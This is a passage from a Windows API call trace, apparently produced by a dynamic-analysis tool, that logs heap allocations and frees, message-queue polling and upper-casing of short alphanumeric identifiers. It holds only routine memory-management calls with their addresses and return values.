hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.100] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0189.101] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.101] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13415) returned 0x24d7a58 [0189.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13415) returned 0x34c5670 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0189.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.106] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0189.106] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.106] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.107] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.107] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.108] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.109] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.109] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.109] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.109] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.109] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.109] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.110] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.110] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.110] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.111] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.111] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.111] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.111] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.111] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.112] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.113] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 